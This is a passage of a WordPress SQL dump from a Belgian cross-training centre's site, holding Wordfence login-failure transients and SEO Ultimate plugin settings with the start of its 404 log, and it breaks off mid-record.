(52151, '_transient_wflginfl_2945210952', '1', 'no'),
(52154, '_transient_timeout_wflginfl_2975591811', '1443921574', 'no'),
(52155, '_transient_wflginfl_2975591811', '1', 'no'),
(52156, '_transient_timeout_wflginfl_1654718025', '1443921689', 'no'),
(52157, '_transient_wflginfl_1654718025', '1', 'no'),
(52158, '_transient_timeout_wflginfl_1731410865', '1443921772', 'no'),
(52159, '_transient_wflginfl_1731410865', '1', 'no'),
(52160, '_transient_timeout_wflginfl_1497708287', '1443923346', 'no'),
(52161, '_transient_wflginfl_1497708287', '1', 'no'),
(52162, '_transient_timeout_wflginfl_1524230844', '1443923662', 'no'),
(52163, '_transient_wflginfl_1524230844', '1', 'no'),
(52164, '_transient_timeout_wflginfl_48012539', '1443931586', 'no'),
(52165, '_transient_wflginfl_48012539', '2', 'no'),
(52169, '_transient_timeout_wflginfl_831975881', '1443931847', 'no'),
(52170, '_transient_wflginfl_831975881', '1', 'no'),
(52171, '_transient_timeout_wflginfl_3013394127', '1443932312', 'no'),
(52172, '_transient_wflginfl_3013394127', '1', 'no'),
(52173, '_transient_timeout_wflginfl_3386312262', '1443934515', 'no'),
(52174, '_transient_wflginfl_3386312262', '1', 'no'),
(52184, '_transient_timeout_wflginfl_1567385991', '1443948346', 'no'),
(52178, '_transient_timeout_wflginfl_1803776647', '1443939644', 'no'),
(52179, '_transient_wflginfl_1803776647', '1', 'no'),
(52185, '_transient_wflginfl_1567385991', '1', 'no'),
(52186, '_transient_timeout_wflginfl_1569695390', '1443948479', 'no'),
(52187, '_transient_wflginfl_1569695390', '1', 'no'),
(52190, '_transient_timeout_wflginfl_2006780782', '1443950544', 'no'),
(52191, '_transient_wflginfl_2006780782', '1', 'no'),
(52192, '_transient_timeout_wflginfl_1386616449', '1443951860', 'no'),
(52193, '_transient_wflginfl_1386616449', '1', 'no'),
(52201, '_transient_timeout_wflginfl_1607530666', '1443957070', 'no'),
(52202, '_transient_wflginfl_1607530666', '1', 'no'),
(52926, '_transient_wflginfl_33025283', '1', 'no'),
(52930, '_transient_wflginfl_3383861943', '1', 'no'),
(52931, '_transient_timeout_wflginfl_2057831666', '1444424463', 'no'),
(52932, '_transient_wflginfl_2057831666', '1', 'no'),
(52933, '_transient_timeout_wflginfl_87042145', '1444424808', 'no'),
(52934, '_transient_wflginfl_87042145', '1', 'no'),
(52937, '_transient_timeout_wflginfl_1503260332', '1444425434', 'no'),
(52938, '_transient_wflginfl_1503260332', '1', 'no'),
(52939, '_transient_timeout_wflginfl_3717616534', '1444426352', 'no');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(52940, '_transient_wflginfl_3717616534', '1', 'no'),
(52941, '_transient_timeout_wflginfl_2172686911', '1444426644', 'no'),
(52203, '_transient_timeout_wflginfl_995639224', '1443957199', 'no'),
(52204, '_transient_wflginfl_995639224', '1', 'no'),
(52211, '_transient_timeout_wflginfl_2356150715', '1443959996', 'no'),
(52212, '_transient_wflginfl_2356150715', '1', 'no'),
(52215, '_transient_timeout_wflginfl_1317295538', '1443961684', 'no'),
(52216, '_transient_wflginfl_1317295538', '1', 'no'),
(52217, '_transient_timeout_wflginfl_1667368320', '1443961997', 'no'),
(52218, '_transient_wflginfl_1667368320', '1', 'no'),
(52219, '_transient_timeout_wflginfl_1947177317', '1443962667', 'no'),
(52220, '_transient_wflginfl_1947177317', '1', 'no'),
(52221, '_transient_timeout_wflginfl_3562890437', '1443963161', 'no'),
(52222, '_transient_wflginfl_3562890437', '1', 'no'),
(52223, '_transient_timeout_wflginfl_1411115567', '1443963523', 'no'),
(52224, '_transient_wflginfl_1411115567', '1', 'no'),
(52228, '_transient_timeout_wflginfl_1835353347', '1443964358', 'no'),
(52229, '_transient_wflginfl_1835353347', '1', 'no'),
(52230, '_transient_timeout_wflginfl_1384865683', '1443964724', 'no'),
(52231, '_transient_wflginfl_1384865683', '1', 'no'),
(52234, '_transient_timeout_wflginfl_1355361744', '1443965134', 'no'),
(52235, '_transient_wflginfl_1355361744', '1', 'no'),
(52236, '_transient_timeout_wflginfl_3076023660', '1443966732', 'no'),
(52237, '_transient_wflginfl_3076023660', '1', 'no'),
(52238, '_transient_timeout_wflginfl_3075719843', '1443966832', 'no'),
(52239, '_transient_wflginfl_3075719843', '1', 'no'),
(52240, '_transient_timeout_wflginfl_3287690307', '1443967467', 'no'),
(52241, '_transient_wflginfl_3287690307', '1', 'no'),
(52246, '_transient_timeout_wflginfl_737647832', '1443969696', 'no'),
(52247, '_transient_wflginfl_737647832', '1', 'no'),
(52248, '_transient_timeout_wflginfl_1332068576', '1443970709', 'no'),
(52249, '_transient_wflginfl_1332068576', '1', 'no'),
(52250, '_transient_timeout_wflginfl_1416318985', '1443971347', 'no'),
(52251, '_transient_wflginfl_1416318985', '1', 'no'),
(52254, '_transient_timeout_wflginfl_1361936707', '1443973230', 'no'),
(52255, '_transient_wflginfl_1361936707', '1', 'no'),
(52456, '_transient_timeout_wflginfl_1501150150', '1444086626', 'no'),
(52457, '_transient_wflginfl_1501150150', '1', 'no'),
(52259, '_transient_timeout_wflginfl_94048596', '1443976802', 'no'),
(52260, '_transient_wflginfl_94048596', '1', 'no'),
(52261, '_transient_timeout_wflginfl_1892732442', '1443977860', 'no'),
(52262, '_transient_wflginfl_1892732442', '1', 'no'),
(52263, '_transient_timeout_wflginfl_1892086711', '1443978144', 'no'),
(52264, '_transient_wflginfl_1892086711', '1', 'no'),
(52267, '_transient_timeout_wflginfl_1848039847', '1443981198', 'no'),
(52268, '_transient_wflginfl_1848039847', '1', 'no'),
(52269, '_transient_timeout_wflginfl_1409441831', '1443981568', 'no'),
(52270, '_transient_wflginfl_1409441831', '1', 'no'),
(52271, '_transient_timeout_wflginfl_1318662311', '1443982046', 'no'),
(52272, '_transient_wflginfl_1318662311', '1', 'no'),
(52563, '_transient_timeout_wflginfl_1892412337', '1444176360', 'no'),
(52564, '_transient_wflginfl_1892412337', '2', 'no'),
(52275, '_transient_timeout_wflginfl_1599449408', '1443982127', 'no'),
(52276, '_transient_wflginfl_1599449408', '1', 'no'),
(52281, '_transient_timeout_wflginfl_1520190214', '1443982868', 'no'),
(52282, '_transient_wflginfl_1520190214', '1', 'no'),
(52283, '_transient_timeout_wflginfl_3310999652', '1443984052', 'no'),
(52284, '_transient_wflginfl_3310999652', '1', 'no'),
(52287, '_transient_timeout_wflginfl_2017214466', '1443989329', 'no'),
(52288, '_transient_wflginfl_2017214466', '1', 'no'),
(52294, '_transient_timeout_wflginfl_1497829281', '1443990965', 'no'),
(53594, '_transient_timeout_wflginfl_1585754113', '1445120969', 'no'),
(53595, '_transient_wflginfl_1585754113', '1', 'no'),
(52290, '_transient_timeout_wflginfl_831874289', '1443990303', 'no'),
(52291, '_transient_wflginfl_831874289', '1', 'no'),
(52295, '_transient_wflginfl_1497829281', '1', 'no'),
(52296, '_transient_timeout_wflginfl_3000804680', '1443991175', 'no'),
(52297, '_transient_wflginfl_3000804680', '1', 'no'),
(52298, '_transient_timeout_wflginfl_1489463044', '1443991281', 'no'),
(52299, '_transient_wflginfl_1489463044', '1', 'no'),
(52300, '_transient_timeout_wflginfl_2591582831', '1443991420', 'no'),
(52301, '_transient_wflginfl_2591582831', '1', 'no'),
(52304, '_transient_timeout_wflginfl_736302908', '1443993449', 'no'),
(52305, '_transient_wflginfl_736302908', '1', 'no'),
(52306, '_transient_timeout_wflginfl_1835180487', '1443995445', 'no'),
(52307, '_transient_wflginfl_1835180487', '1', 'no'),
(52313, '_transient_timeout_wflginfl_1887823132', '1443999320', 'no'),
(52314, '_transient_wflginfl_1887823132', '1', 'no'),
(52916, '_transient_timeout_wflginfl_3159338940', '1444421624', 'no'),
(52917, '_transient_wflginfl_3159338940', '1', 'no'),
(52918, '_transient_timeout_wflginfl_1892870899', '1444422116', 'no'),
(52919, '_transient_wflginfl_1892870899', '1', 'no'),
(52920, '_transient_timeout_wflginfl_90707342', '1444422306', 'no'),
(52921, '_transient_wflginfl_90707342', '1', 'no'),
(52922, '_transient_timeout_wflginfl_1588602992', '1444423731', 'no'),
(52923, '_transient_wflginfl_1588602992', '1', 'no'),
(52929, '_transient_timeout_wflginfl_3383861943', '1444424392', 'no'),
(52925, '_transient_timeout_wflginfl_33025283', '1444424351', 'no'),
(52323, '_transient_timeout_wflginfl_2992451774', '1444002818', 'no'),
(52324, '_transient_wflginfl_2992451774', '1', 'no'),
(52325, '_transient_timeout_wflginfl_1327592121', '1444002856', 'no'),
(52326, '_transient_wflginfl_1327592121', '1', 'no'),
(52330, '_transient_timeout_wflginfl_87465831', '1444007505', 'no'),
(52331, '_transient_wflginfl_87465831', '1', 'no'),
(54341, '_transient_timeout_wflginfl_1102513298', '1445295649', 'no'),
(52332, '_transient_timeout_wflginfl_1600584041', '1444007899', 'no'),
(52333, '_transient_wflginfl_1600584041', '1', 'no'),
(52334, '_transient_timeout_wflginfl_2960534036', '1444007970', 'no'),
(52335, '_transient_wflginfl_2960534036', '1', 'no'),
(52801, '_transient_timeout_wflginfl_3586666366', '1444353336', 'no'),
(52802, '_transient_wflginfl_3586666366', '1', 'no'),
(52340, '_transient_timeout_wflginfl_2063101292', '1444011534', 'no'),
(52341, '_transient_wflginfl_2063101292', '1', 'no'),
(52342, '_transient_timeout_wflginfl_3580593311', '1444014163', 'no'),
(52343, '_transient_wflginfl_3580593311', '1', 'no'),
(52345, '_transient_timeout_wflginfl_1563140310', '1444015006', 'no'),
(52346, '_transient_wflginfl_1563140310', '1', 'no'),
(52347, '_transient_timeout_wflginfl_1982506284', '1444017576', 'no'),
(52348, '_transient_wflginfl_1982506284', '1', 'no'),
(52349, '_transient_timeout_wflginfl_2537708635', '1444017912', 'no'),
(52350, '_transient_wflginfl_2537708635', '1', 'no'),
(52353, '_transient_timeout_wflginfl_3004748267', '1444021775', 'no'),
(52354, '_transient_wflginfl_3004748267', '1', 'no'),
(52358, '_transient_timeout_wflginfl_1136757476', '1444027132', 'no'),
(52359, '_transient_wflginfl_1136757476', '1', 'no'),
(52360, '_transient_timeout_wflginfl_2982080675', '1444027761', 'no'),
(52361, '_transient_wflginfl_2982080675', '1', 'no'),
(52368, '_transient_timeout_wflginfl_1855971978', '1444034042', 'no'),
(52364, '_transient_timeout_wflginfl_656605409', '1444033053', 'no'),
(52365, '_transient_wflginfl_656605409', '1', 'no'),
(52369, '_transient_wflginfl_1855971978', '1', 'no'),
(52373, '_transient_timeout_wflginfl_1868403810', '1444037918', 'no'),
(52374, '_transient_wflginfl_1868403810', '1', 'no'),
(52433, '_transient_timeout_wflginfl_3539817577', '1444075417', 'no'),
(52434, '_transient_wflginfl_3539817577', '1', 'no'),
(52380, '_transient_timeout_wflginfl_1676237695', '1444039574', 'no'),
(52381, '_transient_wflginfl_1676237695', '1', 'no'),
(52903, '_transient_timeout_wflginfl_3321884719', '1444418918', 'no'),
(52904, '_transient_wflginfl_3321884719', '1', 'no'),
(52907, '_transient_timeout_wflginfl_1144947287', '1444426792', 'no'),
(52908, '_transient_wflginfl_1144947287', '2', 'no'),
(52909, '_transient_timeout_wflginfl_1416549452', '1444420303', 'no'),
(52910, '_transient_wflginfl_1416549452', '1', 'no'),
(52911, '_transient_timeout_wflginfl_1332963003', '1444420637', 'no'),
(52912, '_transient_wflginfl_1332963003', '1', 'no'),
(52913, '_transient_timeout_wflginfl_2039957471', '1444421123', 'no'),
(52914, '_transient_wflginfl_2039957471', '1', 'no'),
(52662, '_transient_timeout_wflginfl_658067197', '1444235938', 'no'),
(52663, '_transient_wflginfl_658067197', '1', 'no'),
(52386, '_transient_timeout_wflginfl_1892500753', '1444041153', 'no'),
(52387, '_transient_wflginfl_1892500753', '1', 'no'),
(52388, '_transient_timeout_wflginfl_2015129180', '1444042612', 'no'),
(52389, '_transient_wflginfl_2015129180', '1', 'no'),
(52400, '_transient_timeout_wflginfl_1892687608', '1444051827', 'no'),
(52401, '_transient_wflginfl_1892687608', '1', 'no'),
(52402, '_transient_timeout_wflginfl_835484330', '1444052070', 'no'),
(52403, '_transient_wflginfl_835484330', '1', 'no'),
(52404, '_transient_timeout_wflginfl_2587214850', '1444052134', 'no'),
(52405, '_transient_wflginfl_2587214850', '1', 'no'),
(52407, '_transient_timeout_wflginfl_2083227569', '1444054469', 'no'),
(52408, '_transient_wflginfl_2083227569', '1', 'no'),
(52411, '_transient_timeout_wflginfl_1975947594', '1444059627', 'no'),
(52412, '_transient_wflginfl_1975947594', '1', 'no'),
(52414, '_transient_timeout_wflginfl_3368488570', '1444061415', 'no'),
(52415, '_transient_wflginfl_3368488570', '1', 'no'),
(52417, '_transient_timeout_wflginfl_1975851909', '1444061576', 'no'),
(52418, '_transient_wflginfl_1975851909', '1', 'no'),
(52419, '_transient_timeout_wflginfl_1892050756', '1444061904', 'no'),
(52420, '_transient_wflginfl_1892050756', '1', 'no'),
(52423, '_transient_timeout_wflginfl_831713429', '1444065249', 'no'),
(52424, '_transient_wflginfl_831713429', '1', 'no'),
(52425, '_transient_timeout_wflginfl_3198360045', '1444066020', 'no'),
(52426, '_transient_wflginfl_3198360045', '1', 'no'),
(52437, '_transient_timeout_wflginfl_3173622991', '1444076357', 'no'),
(52438, '_transient_wflginfl_3173622991', '1', 'no'),
(52440, '_transient_timeout_wflginfl_31788384', '1444079399', 'no'),
(52441, '_transient_wflginfl_31788384', '1', 'no'),
(52443, '_transient_timeout_wflginfl_3065156578', '1444079421', 'no'),
(52444, '_transient_wflginfl_3065156578', '1', 'no'),
(52451, '_transient_timeout_wflginfl_1121257989', '1444083264', 'no'),
(52452, '_transient_wflginfl_1121257989', '1', 'no'),
(57041, '_transient_timeout_wflginfl_244189372', '1446487705', 'no'),
(57042, '_transient_wflginfl_244189372', '1', 'no'),
(52893, '_transient_timeout_wflginfl_1595153049', '1444417722', 'no'),
(52894, '_transient_wflginfl_1595153049', '1', 'no'),
(52897, '_transient_timeout_wflginfl_1361089170', '1444418310', 'no'),
(52898, '_transient_wflginfl_1361089170', '1', 'no'),
(59603, '_transient_timeout_wflginfl_1416607912', '1447611133', 'no'),
(59604, '_transient_wflginfl_1416607912', '1', 'no'),
(52901, '_transient_timeout_wflginfl_1118911725', '1444418450', 'no'),
(52902, '_transient_wflginfl_1118911725', '1', 'no'),
(52449, '_transient_timeout_wflginfl_788057928', '1444083157', 'no'),
(52450, '_transient_wflginfl_788057928', '1', 'no'),
(52453, '_transient_timeout_wflginfl_785837346', '1444085335', 'no'),
(52454, '_transient_wflginfl_785837346', '1', 'no'),
(52464, '_transient_timeout_wflginfl_779703514', '1444087476', 'no'),
(52465, '_transient_wflginfl_779703514', '1', 'no'),
(52466, '_transient_timeout_wflginfl_3088084559', '1444088271', 'no'),
(52467, '_transient_wflginfl_3088084559', '1', 'no'),
(52470, '_transient_timeout_wflginfl_1370982269', '1444090232', 'no'),
(52471, '_transient_wflginfl_1370982269', '1', 'no'),
(52472, '_transient_timeout_wflginfl_1332467983', '1444090747', 'no'),
(52473, '_transient_wflginfl_1332467983', '1', 'no'),
(52476, '_transient_timeout_wflginfl_2011911778', '1444096349', 'no'),
(52477, '_transient_wflginfl_2011911778', '1', 'no'),
(52483, '_transient_timeout_wflginfl_1731367998', '1444108255', 'no'),
(52484, '_transient_wflginfl_1731367998', '1', 'no'),
(52485, '_transient_timeout_wflginfl_3378053241', '1444108704', 'no'),
(52486, '_transient_wflginfl_3378053241', '1', 'no'),
(52487, '_transient_timeout_wflginfl_1187071927', '1444108952', 'no'),
(52488, '_transient_wflginfl_1187071927', '1', 'no'),
(52489, '_transient_timeout_wflginfl_3128484659', '1444110169', 'no'),
(52490, '_transient_wflginfl_3128484659', '1', 'no'),
(52495, '_transient_timeout_wflginfl_1139163435', '1444118359', 'no'),
(52496, '_transient_wflginfl_1139163435', '1', 'no'),
(52510, '_transient_timeout_wflginfl_1729141574', '1444131300', 'no'),
(52511, '_transient_wflginfl_1729141574', '1', 'no'),
(52879, '_transient_timeout_wflginfl_3155815089', '1444413681', 'no'),
(52880, '_transient_wflginfl_3155815089', '1', 'no'),
(52883, '_transient_timeout_wflginfl_2588533615', '1444414571', 'no'),
(52884, '_transient_wflginfl_2588533615', '1', 'no'),
(52885, '_transient_timeout_wflginfl_3277942372', '1444415810', 'no'),
(52886, '_transient_wflginfl_3277942372', '2', 'no'),
(52887, '_transient_timeout_wflginfl_1975661550', '1444416518', 'no'),
(52888, '_transient_wflginfl_1975661550', '1', 'no'),
(52889, '_transient_timeout_wflginfl_3398335780', '1444417058', 'no'),
(52890, '_transient_wflginfl_3398335780', '1', 'no'),
(52512, '_transient_timeout_wflginfl_1587297332', '1444132790', 'no'),
(52513, '_transient_wflginfl_1587297332', '1', 'no'),
(52619, '_transient_timeout_wflginfl_3319656849', '1444210164', 'no'),
(52620, '_transient_wflginfl_3319656849', '1', 'no'),
(52521, '_transient_timeout_wflginfl_3170620818', '1444140092', 'no'),
(52522, '_transient_wflginfl_3170620818', '1', 'no'),
(52525, '_transient_timeout_wflginfl_1312810287', '1444141616', 'no'),
(52526, '_transient_wflginfl_1312810287', '1', 'no'),
(52529, '_transient_timeout_wflginfl_3290736430', '1444146277', 'no'),
(52530, '_transient_wflginfl_3290736430', '1', 'no'),
(52531, '_transient_timeout_wflginfl_1308464001', '1444146494', 'no'),
(52532, '_transient_wflginfl_1308464001', '1', 'no'),
(52533, '_transient_timeout_wflginfl_692255862', '1444146734', 'no'),
(52534, '_transient_wflginfl_692255862', '1', 'no'),
(52539, '_transient_timeout_wflginfl_785800203', '1444154114', 'no'),
(52540, '_transient_wflginfl_785800203', '1', 'no'),
(52545, '_transient_timeout_wflginfl_1840871287', '1444156989', 'no'),
(52546, '_transient_wflginfl_1840871287', '1', 'no'),
(52547, '_transient_timeout_wflginfl_2967637591', '1444157468', 'no'),
(52548, '_transient_wflginfl_2967637591', '1', 'no'),
(52550, '_transient_timeout_wflginfl_1374073275', '1444160073', 'no'),
(52551, '_transient_wflginfl_1374073275', '1', 'no'),
(52556, '_transient_timeout_wflginfl_1490844186', '1444162215', 'no'),
(52557, '_transient_wflginfl_1490844186', '1', 'no'),
(52559, '_transient_timeout_wflginfl_3057920942', '1444162545', 'no'),
(52560, '_transient_wflginfl_3057920942', '1', 'no'),
(52561, '_transient_timeout_wflginfl_1892050869', '1444164242', 'no'),
(52562, '_transient_wflginfl_1892050869', '1', 'no'),
(52569, '_transient_timeout_wflginfl_1407783891', '1444167895', 'no'),
(52570, '_transient_wflginfl_1407783891', '1', 'no'),
(52571, '_transient_timeout_wflginfl_1434031090', '1444168104', 'no'),
(52572, '_transient_wflginfl_1434031090', '1', 'no'),
(52573, '_transient_timeout_wflginfl_1743968490', '1444168523', 'no'),
(52574, '_transient_wflginfl_1743968490', '1', 'no'),
(52590, '_transient_timeout_wflginfl_759211330', '1444178604', 'no'),
(52591, '_transient_wflginfl_759211330', '1', 'no'),
(52869, '_transient_timeout_wflginfl_1887838289', '1444411847', 'no'),
(52870, '_transient_wflginfl_1887838289', '1', 'no'),
(52871, '_transient_timeout_wflginfl_1589501749', '1444411901', 'no'),
(52872, '_transient_wflginfl_1589501749', '1', 'no'),
(52873, '_transient_timeout_wflginfl_1150681182', '1444420155', 'no'),
(52874, '_transient_wflginfl_1150681182', '2', 'no'),
(52875, '_transient_timeout_wflginfl_657686059', '1444412810', 'no'),
(52876, '_transient_wflginfl_657686059', '1', 'no'),
(52877, '_transient_timeout_wflginfl_1908169910', '1444413115', 'no'),
(52878, '_transient_wflginfl_1908169910', '1', 'no'),
(52594, '_transient_timeout_wflginfl_1380954385', '1444180972', 'no'),
(52595, '_transient_wflginfl_1380954385', '1', 'no'),
(52598, '_transient_timeout_wflginfl_762476811', '1444184690', 'no'),
(52599, '_transient_wflginfl_762476811', '1', 'no'),
(52609, '_transient_timeout_wflginfl_3418513828', '1444197140', 'no'),
(52610, '_transient_wflginfl_3418513828', '1', 'no'),
(52614, '_transient_timeout_wflginfl_3189166229', '1444201883', 'no'),
(52615, '_transient_wflginfl_3189166229', '1', 'no'),
(52634, '_transient_timeout_wflginfl_1563422194', '1444217985', 'no'),
(52635, '_transient_wflginfl_1563422194', '1', 'no'),
(52858, '_transient_timeout_wflginfl_1451073334', '1444410197', 'no'),
(52859, '_transient_wflginfl_1451073334', '1', 'no'),
(52861, '_transient_timeout_wflginfl_1589556219', '1444410709', 'no'),
(52862, '_transient_wflginfl_1589556219', '1', 'no'),
(52863, '_transient_timeout_wflginfl_3315962555', '1444411314', 'no'),
(52864, '_transient_wflginfl_3315962555', '1', 'no'),
(52865, '_transient_timeout_wflginfl_2006950647', '1444411379', 'no'),
(52866, '_transient_wflginfl_2006950647', '1', 'no'),
(52867, '_transient_timeout_wflginfl_1841322710', '1444411788', 'no'),
(52868, '_transient_wflginfl_1841322710', '1', 'no'),
(52636, '_transient_timeout_wflginfl_2083255343', '1444219567', 'no'),
(52637, '_transient_wflginfl_2083255343', '1', 'no'),
(52642, '_transient_timeout_wflginfl_1892173935', '1444222276', 'no'),
(52643, '_transient_wflginfl_1892173935', '1', 'no'),
(52645, '_transient_timeout_wflginfl_2944988873', '1444223628', 'no'),
(52646, '_transient_wflginfl_2944988873', '1', 'no'),
(52647, '_transient_timeout_wflginfl_3000774479', '1444225877', 'no'),
(52648, '_transient_wflginfl_3000774479', '1', 'no'),
(52651, '_transient_timeout_wflginfl_1366067374', '1444229459', 'no'),
(52652, '_transient_wflginfl_1366067374', '1', 'no'),
(52660, '_transient_timeout_wflginfl_1333010427', '1444234473', 'no'),
(52661, '_transient_wflginfl_1333010427', '1', 'no'),
(52668, '_transient_timeout_wflginfl_3286545179', '1444245598', 'no'),
(52669, '_transient_wflginfl_3286545179', '1', 'no'),
(52676, '_transient_timeout_wflginfl_36934727', '1444250518', 'no'),
(52674, '_transient_timeout_wflginfl_1549220434', '1444249400', 'no'),
(52675, '_transient_wflginfl_1549220434', '1', 'no'),
(52677, '_transient_wflginfl_36934727', '1', 'no'),
(52679, '_transient_timeout_wflginfl_3077405950', '1444252647', 'no'),
(52680, '_transient_wflginfl_3077405950', '1', 'no'),
(52681, '_transient_timeout_wflginfl_3645320515', '1444255057', 'no'),
(52682, '_transient_wflginfl_3645320515', '1', 'no'),
(52695, '_transient_timeout_wflginfl_1377255252', '1444260456', 'no'),
(52696, '_transient_wflginfl_1377255252', '1', 'no'),
(52803, '_transient_timeout_wflginfl_778257801', '1444356176', 'no'),
(52804, '_transient_wflginfl_778257801', '1', 'no'),
(52811, '_transient_timeout_wflginfl_2110876890', '1444365935', 'no'),
(52812, '_transient_wflginfl_2110876890', '1', 'no'),
(52823, '_transient_timeout_wflginfl_1748869384', '1444385783', 'no'),
(52824, '_transient_wflginfl_1748869384', '1', 'no'),
(53619, '_transient_wflginfl_1416372420', '1', 'no'),
(53626, '_transient_timeout_wflginfl_412895423', '1445124413', 'no'),
(53627, '_transient_wflginfl_412895423', '1', 'no'),
(53628, '_transient_timeout_wflginfl_1675978474', '1445124778', 'no'),
(52697, '_transient_timeout_wflginfl_1040295453', '1444261887', 'no'),
(52698, '_transient_wflginfl_1040295453', '1', 'no'),
(52705, '_transient_timeout_wflginfl_657073524', '1444264127', 'no'),
(52706, '_transient_wflginfl_657073524', '1', 'no'),
(52710, '_transient_timeout_wflginfl_248455926', '1444270713', 'no'),
(52711, '_transient_wflginfl_248455926', '1', 'no'),
(52712, '_transient_timeout_wflginfl_1544234470', '1444271448', 'no'),
(52713, '_transient_wflginfl_1544234470', '1', 'no'),
(52716, '_transient_timeout_wflginfl_3178870410', '1444276399', 'no'),
(52717, '_transient_wflginfl_3178870410', '1', 'no'),
(52718, '_transient_timeout_wflginfl_1506940071', '1444277302', 'no'),
(52719, '_transient_wflginfl_1506940071', '1', 'no'),
(52737, '_transient_timeout_wflginfl_1834783855', '1444300755', 'no'),
(52738, '_transient_wflginfl_1834783855', '1', 'no'),
(53629, '_transient_wflginfl_1675978474', '1', 'no'),
(53630, '_transient_timeout_wflginfl_1892086746', '1445124938', 'no'),
(53631, '_transient_wflginfl_1892086746', '1', 'no'),
(53632, '_transient_timeout_wflginfl_1394375669', '1445125473', 'no'),
(53633, '_transient_wflginfl_1394375669', '1', 'no'),
(53634, '_transient_timeout_wflginfl_1372559411', '1445125870', 'no'),
(52833, '_transient_timeout_wflginfl_837603198', '1444392697', 'no'),
(52834, '_transient_wflginfl_837603198', '1', 'no'),
(52837, '_transient_timeout_wflginfl_3000819422', '1444398717', 'no'),
(52838, '_transient_wflginfl_3000819422', '1', 'no'),
(52749, '_transient_timeout_wflginfl_1010127731', '1444312970', 'no'),
(52750, '_transient_wflginfl_1010127731', '1', 'no'),
(52762, '_transient_timeout_wflginfl_1868076444', '1444329717', 'no'),
(52763, '_transient_wflginfl_1868076444', '1', 'no'),
(52766, '_transient_timeout_wflginfl_2579594477', '1444331600', 'no'),
(52767, '_transient_wflginfl_2579594477', '1', 'no'),
(52768, '_transient_timeout_wflginfl_3310853906', '1444334463', 'no'),
(52769, '_transient_wflginfl_3310853906', '1', 'no'),
(52772, '_transient_timeout_wflginfl_2512954399', '1444337873', 'no'),
(52773, '_transient_wflginfl_2512954399', '1', 'no'),
(52776, '_transient_timeout_wflginfl_1333233473', '1444340907', 'no'),
(52777, '_transient_wflginfl_1333233473', '1', 'no'),
(52781, '_transient_timeout_wflginfl_3106167551', '1444342476', 'no'),
(52782, '_transient_wflginfl_3106167551', '1', 'no'),
(52848, '_transient_timeout_wflginfl_520197566', '1444406840', 'no'),
(54792, '_transient_timeout_wflginfl_3252816196', '1445476452', 'no'),
(54793, '_transient_wflginfl_3252816196', '1', 'no'),
(52849, '_transient_wflginfl_520197566', '1', 'no'),
(52852, '_transient_timeout_wflginfl_1500741680', '1444409123', 'no'),
(52853, '_transient_wflginfl_1500741680', '1', 'no'),
(52854, '_transient_timeout_wflginfl_1471366291', '1444409547', 'no'),
(52855, '_transient_wflginfl_1471366291', '1', 'no'),
(52856, '_transient_timeout_wflginfl_1380542048', '1444410105', 'no'),
(52857, '_transient_wflginfl_1380542048', '1', 'no'),
(771, 'seo_ultimate', 'a:3:{s:7:\"version\";s:5:\"7.6.1\";s:7:\"modules\";a:37:{s:7:\"modules\";i:10;s:7:\"widgets\";i:10;s:4:\"fofs\";i:10;s:8:\"fofs-log\";i:10;s:13:\"fofs-settings\";i:10;s:12:\"import-aiosp\";i:10;s:9:\"canonical\";i:10;s:9:\"user-code\";i:10;s:17:\"content-autolinks\";i:10;s:26:\"content-autolinks-settings\";i:10;s:9:\"autolinks\";i:10;s:5:\"files\";i:10;s:16:\"footer-autolinks\";i:10;s:25:\"footer-autolinks-settings\";i:10;s:15:\"global-settings\";i:10;s:7:\"install\";i:10;s:21:\"internal-link-aliases\";i:10;s:7:\"linkbox\";i:10;s:17:\"meta-descriptions\";i:10;s:11:\"meta-robots\";i:10;s:10:\"more-links\";i:10;s:7:\"noindex\";i:10;s:9:\"opengraph\";i:10;s:10:\"permalinks\";i:10;s:13:\"rich-snippets\";i:10;s:8:\"settings\";i:10;s:13:\"settings-data\";i:10;s:11:\"wp-settings\";i:10;s:15:\"sharing-buttons\";i:10;s:5:\"slugs\";i:10;s:6:\"titles\";i:10;s:9:\"uninstall\";i:10;s:16:\"webmaster-verify\";i:10;s:8:\"sds-blog\";i:10;s:4:\"misc\";i:10;s:13:\"meta-keywords\";i:-10;s:13:\"link-nofollow\";i:-10;}s:4:\"cron\";a:1:{s:8:\"sds-blog\";a:1:{s:13:\"load_blog_rss\";a:3:{i:0;s:25:\"su-sds-blog-load-blog-rss\";i:1;i:1481157183;i:2;s:6:\"hourly\";}}}}', 'yes');
INSERT INTO `www2_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(772, 'seo_ultimate_module_404s', 'a:7:{s:10:\"exceptions\";s:66:\"*/favicon.ico\n*/apple-touch-icon.png\n*/pingserver.php\n*/xmlrpc.php\";s:12:\"max_log_size\";i:100;s:11:\"log_enabled\";b:1;s:16:\"restrict_logging\";b:1;s:11:\"log_spiders\";b:1;s:24:\"log_errors_with_referers\";b:1;s:3:\"log\";a:101:{s:66:\"http://www.crosstrainingcenter.be/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207699;}s:84:\"http://www.crosstrainingcenter.be/le-cross-training/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/le-cross-training/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207704;}s:84:\"http://www.crosstrainingcenter.be/notre-philosophie/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:52:\"http://www.crosstrainingcenter.be/notre-philosophie/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1385207709;}s:78:\"http://www.crosstrainingcenter.be/les-seances/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/les-seances/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1378436497;}s:74:\"http://www.crosstrainingcenter.be/lequipe/g;m.parentNode.insertBefore(a,m)\";a:5:{s:9:\"hi